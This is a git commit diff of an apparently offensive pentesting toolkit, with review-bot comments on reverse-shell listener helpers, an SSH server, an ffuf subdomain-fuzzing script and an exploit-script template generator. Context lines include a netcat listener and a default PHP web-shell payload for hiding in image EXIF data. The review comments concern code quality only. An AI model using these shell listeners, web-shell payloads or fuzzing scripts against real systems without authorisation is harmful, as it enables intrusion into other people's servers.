new functions

Roman Hergenreder 2023-10-01 11:23:05 +02:00
parent b3cd20ca8b
commit b4a96e1398
5 changed files with 85 additions and 27 deletions

@ -300,6 +300,13 @@ def generate_payload(type, local_address, port, index=None):
def spawn_listener(port): def spawn_listener(port):
pty.spawn(["nc", "-lvvp", str(port)]) pty.spawn(["nc", "-lvvp", str(port)])
def spawn_background_shell(port):
listener = ShellListener("0.0.0.0", port)
listener.startBackground()
while listener.connection is None:
time.sleep(0.5)
return listener
def trigger_shell(func, port): def trigger_shell(func, port):
def _wait_and_exec(): def _wait_and_exec():
time.sleep(1.5) time.sleep(1.5)
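Review bot: `spawn_background_shell` spins forever on `while listener.connection is None` if the callback never arrives, so an exploit script that calls it hangs with no way to recover; a `timeout=None` parameter with a deadline check keeps the current default while letting callers bail, e.g. `deadline = None if timeout is None else time.time() + timeout` before the loop and `if deadline is not None and time.time() > deadline: raise TimeoutError(f"no connection on port {port}")` inside it (how to tear the `ShellListener` down on that path depends on its API, which is not visible here). The listener is also bound to `"0.0.0.0"` unconditionally, so on a shared or multi-homed attack box any host that can reach the port gets the shell; exposing the bind address as a parameter, or at least stating this in a docstring, would avoid surprises. `trigger_shell` starts at the end of the hunk and continues outside it.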

@ -66,11 +66,9 @@ class SSHServer:
paramiko_connection = ParamikoConnection(self) paramiko_connection = ParamikoConnection(self)
transport.start_server(server=paramiko_connection) transport.start_server(server=paramiko_connection)
self.transports.append(transport) self.transports.append(transport)
# for client_sock in self.client_sockets:
except BlockingIOError: except BlockingIOError:
pass pass
# handle_client(client_socket, client_address)
finally: finally:
self.listen_socket.close() self.listen_socket.close()
@ -81,7 +79,7 @@ class SSHServer:
def close(self): def close(self):
if self.listen_socket: if self.listen_socket:
self.listen_socket.close() self.listen_socket.shutdown(socket.SHUT_RDWR)
for sock in self.client_sockets: for sock in self.client_sockets:
sock.close() sock.close()
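Review bot: The new `close()` replaces `self.listen_socket.close()` with `self.listen_socket.shutdown(socket.SHUT_RDWR)` and never closes the socket afterwards, so the listening file descriptor stays open until the object is garbage-collected; `shutdown()` is the right way to wake a thread blocked in `accept()`, but it should be followed by `close()`. On some platforms (macOS, for one) `shutdown()` on a listening socket raises `OSError` with ENOTCONN, so I would write `try: self.listen_socket.shutdown(socket.SHUT_RDWR)` / `except OSError: pass` / `self.listen_socket.close()`. The paramiko transports appended to `self.transports` earlier in the hunk are not closed in the visible part of `close()` either, though the method may continue past the hunk.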

@ -32,6 +32,6 @@ charcountNonExistent=$(curl -s "${PROTOCOL}://$(uuidgen).${DOMAIN}" -k -m 5 | wc
echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}" echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}"
echo "[ ] Fuzzing…" echo "[ ] Fuzzing…"
ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \ (set -x; ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
-w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
-u "${PROTOCOL}://${IP_ADDRESS}" -H "Host: FUZZ.${DOMAIN}" "${@:2}" -u "${PROTOCOL}://${IP_ADDRESS}" -H "Host: FUZZ.${DOMAIN}" "${@:2}")
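Review bot: Wrapping the ffuf call in `(set -x; …)` traces the fully expanded command to stderr, and that includes whatever the caller passes through `"${@:2}"` — typically `-H "Cookie: …"` or `-H "Authorization: …"` for authenticated vhost fuzzing — so session tokens end up in terminal scrollback and in any `script`/`tee` capture of the run. If the intent is only to show what is being executed, an explicit `echo "[ ] ffuf -u ${PROTOCOL}://${IP_ADDRESS} -H 'Host: FUZZ.${DOMAIN}' …"` that omits the passthrough arguments is safer; otherwise a comment next to `set -x` warning that extra arguments are echoed verbatim would at least make the behaviour deliberate. The three baseline sizes are computed above the hunk from single `curl -m 5` requests, so a timeout silently feeds `0` into `--fs`; the hunk does not show any check on them.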

@ -2,26 +2,21 @@
import sys import sys
def generateTemplate(baseUrl): def generate_template(base_url, features):
template = """#!/usr/bin/env python
import os if "proxy" in features or "burp" in features:
import sys proxy = """
import json if \"proxy\" not in kwargs:
import time kwargs[\"proxy\"] = {\"http\":\"http://127.0.0.1:8080\", \"https\":\"http://127.0.0.1:8080\"}
import base64 """
import requests else:
import subprocess proxy = ""
import urllib.parse
from bs4 import BeautifulSoup
from hackingscripts import util, fileserver, rev_shell
from urllib3.exceptions import InsecureRequestWarning variables = {
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
}
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" request_method = f"""def request(method, uri, **kwargs):
def request(method, uri, **kwargs):
if not uri.startswith("/") and uri != "": if not uri.startswith("/") and uri != "":
uri = "/" + uri uri = "/" + uri
@ -35,24 +30,78 @@ def request(method, uri, **kwargs):
if "verify" not in kwargs: if "verify" not in kwargs:
kwargs["verify"] = False kwargs["verify"] = False
{proxy}
return client.request(method, BASE_URL + uri, **kwargs) return client.request(method, BASE_URL + uri, **kwargs)
"""
methods = [request_method]
if "login" in features or "account" in features:
variables["USERNAME"] = '"Blindhero"'
variables["PASSWORD"] = '"test1234"'
methods.append("""
def login(username, password):
session = requests.Session()
res = request("POST", "/login", data={"username": username, "password": password}, session=session)
if res.status_code != 200:
print("[-] Error logging in")
exit()
return session
""")
if "register" in features or "account" in features:
variables["USERNAME"] = '"Blindhero"'
variables["PASSWORD"] = '"test1234"'
methods.append("""
def register(username, password):
res = request("POST", "/register", data={"username": username, "password": password})
if res.status_code != 200:
print("[-] Error registering")
exit()
return True
""")
main = """
if __name__ == "__main__": if __name__ == "__main__":
pass pass
""" % baseUrl """
return template variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
header = f"""#!/usr/bin/env python
import os
import re
import sys
import json
import time
import base64
import requests
import subprocess
import urllib.parse
from bs4 import BeautifulSoup
from hackingscripts import util, fileserver, rev_shell
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
{variables}
"""
return header + "".join(methods) + main
if __name__ == "__main__": if __name__ == "__main__":
if len(sys.argv) < 2: if len(sys.argv) < 2:
print("Usage: %s <URL>" % sys.argv[0]) print("Usage: %s <URL> [features]" % sys.argv[0])
exit() exit()
url = sys.argv[1] url = sys.argv[1]
if "://" not in url: if "://" not in url:
url = "http://" + url url = "http://" + url
template = generateTemplate(url) features = [] if len(sys.argv) < 3 else sys.argv[2].split(",")
template = generate_template(url, features)
print(template) print(template)
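Review bot: The generated `login()` and `register()` helpers report failure with `print(...)` followed by a bare `exit()`, which terminates with status 0 and relies on the `site`-injected `exit` builtin; the template header already imports `sys`, so `sys.exit(1)` would make a failed login visible to the shell and to scripts that chain these tools. `generate_template(base_url, features)` now requires a second argument where `generateTemplate(baseUrl)` took one, and unrecognised names from `sys.argv[2].split(",")` are silently ignored — a default of `features=()` keeps any existing importer working, and a `known = {"proxy", "burp", "login", "register", "account"}` check that prints a warning for leftovers would catch typos like `regsiter`. The `\"` escapes inside the triple-quoted `proxy` string are unnecessary (a plain `"` is valid there), and the hard-coded `"Blindhero"`/`"test1234"` defaults are written into every generated script, which is fine for throwaway exploit code but deserves a one-line comment so they are not mistaken for real credentials. The body of `request()` between the two hunks (old lines 30–35) is not shown, so the `session` kwarg that `login()` passes could not be checked against it.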

@ -3,6 +3,7 @@
import random import random
import math import math
import socket import socket
import base64
import itertools import itertools
import netifaces as ni import netifaces as ni
import string import string
@ -209,6 +210,9 @@ def xor(a, b):
return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ]) return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
def base64urldecode(data):
return base64.urlsafe_b64decode(data + b'=' * (4 - len(data) % 4))
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None): def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
import exif import exif
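Review bot: `base64urldecode` pads with `b'=' * (4 - len(data) % 4)`, which appends four `=` characters when the input length is already a multiple of 4; CPython's non-strict decoder appears to tolerate the surplus, but `(-len(data)) % 4` yields exactly the missing padding and is the usual idiom. The helper also accepts only `bytes` — a `str` JWT segment, the common input for this kind of decoding, raises `TypeError` on the `+` — so I would add `if isinstance(data, str): data = data.encode()` before the padding and a docstring stating that the result is always `bytes`. `set_exif_data` at the end of the hunk is context that continues outside it.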